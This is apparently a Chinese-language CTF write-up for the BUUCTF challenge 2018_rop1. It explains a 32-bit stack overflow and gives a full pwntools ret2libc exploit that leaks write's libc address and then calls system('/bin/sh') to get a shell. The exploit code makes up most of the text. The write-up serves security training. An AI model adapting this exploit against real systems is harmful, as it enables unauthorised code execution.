BUUCTF--铁人三项(第五赛区)_2018_rop1

这题是一题标准的rop。先简单查看下保护：

32位程序，黑盒测试下效果：

一上来就是输入，然后结尾会输出Hello,World.看看IDA中具体逻辑如何：

漏洞点主要在vulnerable_function()函数中。老常规栈溢出了。做这种题的思路：

1.第一次布局通过题目中的write,puts等函数将库函数地址泄露，并能返回到主程序

2.通过计算算出libc基地址进一步得到system地址。

3.找到libc中bin/sh的位置

4.第二次布局就是直接布置rop

exp如下：

#coding=utf-8
from pwn import *    
context.log_level='debug'
#p=remote("node3.buuoj.cn",28424)  
p=process("./2018_rop")
elf=ELF("./2018_rop")
libc=ELF('/lib/i386-linux-gnu/libc-2.27.so')  #here is your libc


vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']

payload = 'a'*(0x88+0x4)
payload += p32(write_plt)        
payload += p32(vul_addr)          
payload += p32(1)                 
payload += p32(write_got)         
payload += p32(4)                 

gdb.attach(p)
p.sendline(payload)
write_addr=u32(p.recv())

print('!!!',hex(write_got))

write_offset=libc.sym['write']
system_offset =libc.sym['system']
binsh_offset =next(libc.search('/bin/sh'))

base_addr = write_addr - write_offset
sys_addr = system_offset + base_addr
bin_addr = binsh_offset + base_addr




payload1 = "a" * 0x88
payload1 += "b"*4
payload1 += p32(sys_addr)+p32(1)+p32(bin_addr)
p.sendline(payload1)
pause()
p.interactive()

我这是打本地的代码，远程的话给了libc用libc，没给libc用LibcSearcher,个人感觉不太好用，很多时候找不到。